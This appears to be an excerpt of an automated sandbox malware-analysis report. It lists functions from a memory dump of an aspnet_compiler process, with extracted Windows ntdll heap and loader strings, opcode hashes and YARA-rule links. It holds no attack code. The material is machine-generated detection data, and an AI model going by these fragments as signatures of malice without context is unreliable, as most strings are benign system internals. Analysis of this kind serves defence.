Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: a94977073725567f3f80503f7cb1168b1fd432f442ac3f6e7337818128781641
Instruction ID: 00adedd6188f10f9f85cdd8f99e8b5edd5deecb3b91cf031081d8f49a2e36acc
Opcode Fuzzy Hash: a94977073725567f3f80503f7cb1168b1fd432f442ac3f6e7337818128781641
Instruction Fuzzy Hash: 5AD1C772804716AFD721DB58CC40B6BBBE8AF94728F054A2EFA8497150E774DB44CBD2

Function 01A90274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A9069F
HEAP: , xrefs: 01A903A6, 01A904B5, 01A905DD, 01A90682, 01A906D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A904D3
About to reallocate block at %p to %Ix bytes, xrefs: 01A903BA
RtlReAllocateHeap, xrefs: 01A902BF, 01A90362
Just reallocated block at %p to %Ix bytes, xrefs: 01A905F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A906EA
HEAP[%wZ]: , xrefs: 01A90399, 01A904A8, 01A905D0, 01A90675, 01A906CC

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
Instruction ID: 8eb5a69ca958fc798c00623859a46e8128e9d8d264401c7e229700c5cc15fe8b
Opcode Fuzzy Hash: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
Instruction Fuzzy Hash: 8BD1FD35600682DFDF22DF68C640AAEBBF5FF8A754F098059F58A9B612C7349981CB50

Function 019DD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 019DD0CF
@, xrefs: 019DD0FD
Control Panel\Desktop\LanguageConfiguration, xrefs: 019DD196
@, xrefs: 019DD313
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 019DD262
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 019DD146
@, xrefs: 019DD2AF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 019DD2C3

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 2d631e022a5bcface58f8b63fee5a4db904b03097ac8cad98877ecd0888e52de
Instruction ID: 7be3ca8833c5c198cf2068c519509dc5899b848e24679869496c7a5ec2f165c3
Opcode Fuzzy Hash: 2d631e022a5bcface58f8b63fee5a4db904b03097ac8cad98877ecd0888e52de
Instruction Fuzzy Hash: 1FA15E719083569FD721DF65C580BABBBE8BF84725F00892EF68897280D774D908CF92

Function 019DF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01A3DF64, 01A3E0A8, 01A3E286, 01A3E39E
(UCRBlock != NULL), xrefs: 01A3DF6F
((LONG)FreeEntry->Size > 1), xrefs: 01A3E0B3
(LONG)FreeEntry->Size > 1, xrefs: 01A3E291
(!TrailingUCR), xrefs: 01A3E3A9
HEAP[%wZ]: , xrefs: 01A3DF57, 01A3E09B, 01A3E279, 01A3E391

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: f5ac1a697ebe0aa63707b602003a27db59378b516a3ae5669318d52efbdb564a
Instruction ID: ff42c7519c1b0170e68c4d54cc262b9372c30efeefa960686a3fafcff16f5816
Opcode Fuzzy Hash: f5ac1a697ebe0aa63707b602003a27db59378b516a3ae5669318d52efbdb564a
Instruction Fuzzy Hash: 5042EC352087829FD715DF28C884B6ABBE5FF88704F08896DF58A8B342D734D946CB52

Function 019FB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 01A483FC
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 01A484D0
SxS, xrefs: 01A483ED
API set, xrefs: 01A483F4, 01A483F9
LdrpPreprocessDllName, xrefs: 01A48403, 01A484D7
minkernel\ntdll\ldrutil.c, xrefs: 01A4840D, 01A484E1

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 9d71347bdb34bb86226d5ead6a964fba9b680699daad38619c7c477b69c22588
Instruction ID: c020d19505282d090dcd10eecab8d5d60c97a66b8b57b56f5404f167b7409685
Opcode Fuzzy Hash: 9d71347bdb34bb86226d5ead6a964fba9b680699daad38619c7c477b69c22588
Instruction Fuzzy Hash: D2C14A31A01216BBDB258F68C890BBEBBA5EF85710F14816DEF0B9B2D1D7B4C944C391

Function 01A163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01A5413A
_LdrpInitialize, xrefs: 01A540DF, 01A54141, 01A54205, 01A5425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01A540D8
minkernel\ntdll\ldrinit.c, xrefs: 01A540E9, 01A5414B, 01A5420F, 01A54269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01A541FE
Delaying execution failed with status 0x%08lx, xrefs: 01A54258

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
Instruction ID: fbb561acad7e0c04580e4aa7700920de2b8a14b9356e07820a8e2f4c0e7c70ad
Opcode Fuzzy Hash: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
Instruction Fuzzy Hash: D1919E70F45B219BEB35DF18DA44BAE7BB1BF44B24F04001CED09AB285E7B49842C791

Function 01A8F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

RtlAllocateHeap, xrefs: 01A8F56D
HEAP: , xrefs: 01A8F6F4, 01A8F7A1, 01A8F7F8
Just allocated block at %p for %Ix bytes, xrefs: 01A8F708
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 01A8F7BE
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A8F809
HEAP[%wZ]: , xrefs: 01A8F6E7, 01A8F794, 01A8F7EB

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: b9d1fccd754cc1d0ce45666379b47ce1392172ddfcbe99c5e0b6861523ba965e
Instruction ID: 0a2569c75f166054614cd119e6ea26a62569f69415155cfd253af37cfe7ca8b1
Opcode Fuzzy Hash: b9d1fccd754cc1d0ce45666379b47ce1392172ddfcbe99c5e0b6861523ba965e
Instruction Fuzzy Hash: 9F912535901683DFEB16EF78C440AADBBF1FF99714F19801DE44AAB261C7359941CB10

Function 019D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 01A399F4, 01A39A07, 01A39A30
minkernel\ntdll\ldrinit.c, xrefs: 01A39A11, 01A39A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A39A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A399ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A39A2A
apphelp.dll, xrefs: 019D6496

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: ac69e601b05cc81d1d97101b2ee45f3cb9a3dd35c9eeb1c38f454fd896e74ed1
Instruction ID: f2228455e43fcc2eed35c4cb335780d23467c01e3ac83c3ad95e12d098b42005
Opcode Fuzzy Hash: ac69e601b05cc81d1d97101b2ee45f3cb9a3dd35c9eeb1c38f454fd896e74ed1
Instruction Fuzzy Hash: 0551B0716087059FE720DF28D881BAB77E8FBC4B48F40491DF58A97190D670E946CB93

Function 01A0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A5031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A502BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A502E7

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
Instruction ID: 5015f535675ba876511c17fea9017ca436a171922b8356b04b66b0713948f34d
Opcode Fuzzy Hash: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
Instruction Fuzzy Hash: 13E1BF706087429FD726CF28D984B2ABBE0BF84724F180A1DF9A5DB2E1D774D945CB42

Function 01A051EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Number-Allowed, xrefs: 01A05247
Kernel-MUI-Language-Disallowed, xrefs: 01A05352
WindowsExcludedProcs, xrefs: 01A0522A
Kernel-MUI-Language-Allowed, xrefs: 01A0527B
Kernel-MUI-Language-SKU, xrefs: 01A0542B

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 48e3ede83df0013d713772b8da6a5947c8ef0fa98641304dc6aae8ae9bcc04c6
Instruction ID: fa491bc88d87bd807d7b6b9420567ee900117081a6e322dc7c262495382d9a40
Opcode Fuzzy Hash: 48e3ede83df0013d713772b8da6a5947c8ef0fa98641304dc6aae8ae9bcc04c6
Instruction Fuzzy Hash: 30F14A72D10229EBDB12DFA9D980AEEBBB9FF48710F15406AE505E7250D6749E01CFA0

Function 019F70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019F7C7C, 019F867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 019F7C96, 019F8696
HEAP[%wZ]: , xrefs: 019F7C6D, 019F8670

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: b5fb11aeaa475d6a7543b186cca491fc6e869793c30d4f0e6e8843eed1276315
Instruction ID: b66231ecd6e5c3fcfdb8806730aff0213490e559652bd8b756c5a24b5d5b89b3
Opcode Fuzzy Hash: b5fb11aeaa475d6a7543b186cca491fc6e869793c30d4f0e6e8843eed1276315
Instruction Fuzzy Hash: CE13B070A00656EFDB29CF68C480BA9BBF5FF49304F1485ADDA49AB381D734A945CF90

Function 019F1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01A45884
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 01A4588F
HEAP[%wZ]: , xrefs: 01A45877
@, xrefs: 01A45A53

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 6b6bd762d5b3279e5423b439a9126ad2ff6a917cea193502dd9ad26a91bc1f95
Instruction ID: 3f330bd88f523a7355fcc5035bbd4deec6883d7274bd3e45a6c68ba09fe15421
Opcode Fuzzy Hash: 6b6bd762d5b3279e5423b439a9126ad2ff6a917cea193502dd9ad26a91bc1f95
Instruction Fuzzy Hash: 8F924871E01229DFEB25CB18C940FA9B7B5BF85314F1581EAEA4DA7291D7309E80CF91

Function 019EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 019EA3FF
LdrResFallbackLangList Enter, xrefs: 019EA3EF
6, xrefs: 019EA3F7
8, xrefs: 019EA3E7

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
Instruction ID: 4650b3ae73c28947ae2d34890a1e45b548e9814b06945c76578b75dd5a134654
Opcode Fuzzy Hash: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
Instruction Fuzzy Hash: 85C19D75108382CFD712CF58C548B6AB7E4FF84704F048D6AF9998B2A1E734CA49CB56

Function 01A18402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01A18422
minkernel\ntdll\ldrinit.c, xrefs: 01A18421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A1855E
@, xrefs: 01A18591

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
Instruction ID: 3d113d85d2ea5c614762cf02c2131f771f950b65fbecb83fd8fafc2541a21e9d
Opcode Fuzzy Hash: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
Instruction Fuzzy Hash: 1B919D71548345AFD721EF25CD80FABBAE8FF84794F44092EFA8892155E738D904CB62

Function 019E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A4106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A40FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A41028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A410AE

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
Instruction ID: c052aa127dc51381513a9214c7a2f23b69e825dc5db2feaf8f7bd6d78b64c97a
Opcode Fuzzy Hash: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
Instruction Fuzzy Hash: BA71C1B1A043159FCB21DF18C988F9B7FE8AFA4764F400868F9498B146D734D588CBD2

Function 01A911A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01A91261
HEAP: , xrefs: 01A9124A, 01A9125D, 01A9125F, 01A912C4
This is located in the %s field of the heap header., xrefs: 01A912D6
HEAP[%wZ]: , xrefs: 01A9123D, 01A912B7

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: d70ccc9b25aa0bdccde8b44a3c271aaf0ead1df4a1d33963ee2cbb7212b56570
Instruction ID: 1ab1f82883b5c7414e849b07903d5626135ee2cb6c01704b39ec1096d57db90a
Opcode Fuzzy Hash: d70ccc9b25aa0bdccde8b44a3c271aaf0ead1df4a1d33963ee2cbb7212b56570
Instruction Fuzzy Hash: 6B310576200152EFDB11EB9CC985FA677E8EF49734F1940A9F506CB290E670EC80CBA4

Function 01A0245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A4A9A2
apphelp.dll, xrefs: 01A02462
LdrpDynamicShimModule, xrefs: 01A4A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A4A992

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
Instruction ID: 3dc956b662187021fb2d9e48cb0f5b25ae073bb8f5d709908db317c54e7ee35a
Opcode Fuzzy Hash: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
Instruction Fuzzy Hash: E3314AB9A80701EBDB32DF5DD945A6E77B4FFC4B00F16001AE907A7246C7705942C781

Function 019D9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01A3BAAD, 01A3BAEA
VirtualQuery Failed 0x%p %x, xrefs: 01A3BAF7
VirtualProtect Failed 0x%p %x, xrefs: 01A3BABA
HEAP[%wZ]: , xrefs: 01A3BAA0, 01A3BADD

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 731371537e9ffa0cfa91eb851d0f962e7a19030135e9131470535ceb9235bb4a
Instruction ID: d2386067bf9bd23425ee03e6b9dc0b7fae8d61d0f7eb65649af28360b39b31a0
Opcode Fuzzy Hash: 731371537e9ffa0cfa91eb851d0f962e7a19030135e9131470535ceb9235bb4a
Instruction Fuzzy Hash: C131E136A00105EFDB01EB59CC84FAABBB9FF85B34F158059F919AB291D770ED40CA60

Function 01A894E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 01A89B84
0, xrefs: 01A89BF6
, xrefs: 01A89AD7

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 92e7d29945a68138f296ee12db7932299aab5caed85196b90a7f377e4f7ddc58
Instruction ID: ed10fa05fb25a78061944a3b58cfc388f0acc0428e4e8316d0747906aac077e1
Opcode Fuzzy Hash: 92e7d29945a68138f296ee12db7932299aab5caed85196b90a7f377e4f7ddc58
Instruction Fuzzy Hash: 2E3212B16083818FE360DF68C984B6BFBE5BBC8308F04492EF59987250D775E949CB52

Function 019E1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019E1596
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 019E1728
HEAP[%wZ]: , xrefs: 019E1712

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 727f510c4b4eaed816863d43e2fe090316cc5d16d28ebe51e712870176c46b92
Instruction ID: c9e48b278102daf8d3e48f3745b9f3e320fdfc7c1214ebf7be0f5e05b0a60198
Opcode Fuzzy Hash: 727f510c4b4eaed816863d43e2fe090316cc5d16d28ebe51e712870176c46b92
Instruction Fuzzy Hash: FCE1E570A046459FDB2ACF28C455BBABBF5BF88700F18886DE59ACB246D734E941CB50

Function 019DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 01A3C2E6
UseFilter, xrefs: 019DA1C1
\??\, xrefs: 01A3C1E4

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
Instruction ID: a85c4d2b021b75bb3faf854defdcd49b176d00d661b4f8519a505343da340536
Opcode Fuzzy Hash: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
Instruction Fuzzy Hash: B9A18C759112299BDB31DF68CC88BEAB7B8EF84710F1041EAEA0DA7251D7359E84CF50

Function 019EB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

{, xrefs: 01A437B6
LdrpResGetResourceDirectory Exit, xrefs: 019EB477
LdrpResGetResourceDirectory Enter, xrefs: 019EB465

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 263d4f67d64cbb149e8afb7d59d8227cee1f6a961881a05acebfbc11b6567deb
Instruction ID: 903c37a8fb6092bb165e7fd13973888272f46deba02e06b46f9852447b342143
Opcode Fuzzy Hash: 263d4f67d64cbb149e8afb7d59d8227cee1f6a961881a05acebfbc11b6567deb
Instruction Fuzzy Hash: D391C171A0421ACFEF22CF58C544BAEB7F4FF44724F148595E95AAB290D7789A40CF90

Function 01A1909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01A19148
%, xrefs: 01A55D3F
&, xrefs: 01A55CF8

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 6ef61740140ff6d48a69a9002c92eaa09f396eff2091eabb14e2a47fac726d18
Instruction ID: 875395e4374091bffa74f097f52914b82a46d4bf04af9c0376f7c16957ee1dc0
Opcode Fuzzy Hash: 6ef61740140ff6d48a69a9002c92eaa09f396eff2091eabb14e2a47fac726d18
Instruction Fuzzy Hash: 8771F1706083029FD714DF28C6A0A6BBBE5FF8471CF148A1DF89A47245D730D945CB92

Function 01A015F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01A4A589
minkernel\ntdll\ldrmap.c, xrefs: 01A4A59A
LdrpCompleteMapModule, xrefs: 01A4A590

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: f12e305e0e3c1963cb389b596f49d1c489f38813c98336c55e6e1275559d5d57
Instruction ID: b60931e61126fed2a031c5d0720a187de39b0f196cee7b5025d5587a8db84465
Opcode Fuzzy Hash: f12e305e0e3c1963cb389b596f49d1c489f38813c98336c55e6e1275559d5d57
Instruction Fuzzy Hash: F35115716007419BEB23CB6CDE44BAABBF4FF80714F180668EA569B6D2D774E940C741

Function 019D758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01A3AFB8
Invalid address specified to %s( %p, %p ), xrefs: 01A3AFCB
HEAP[%wZ]: , xrefs: 01A3AFAB

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
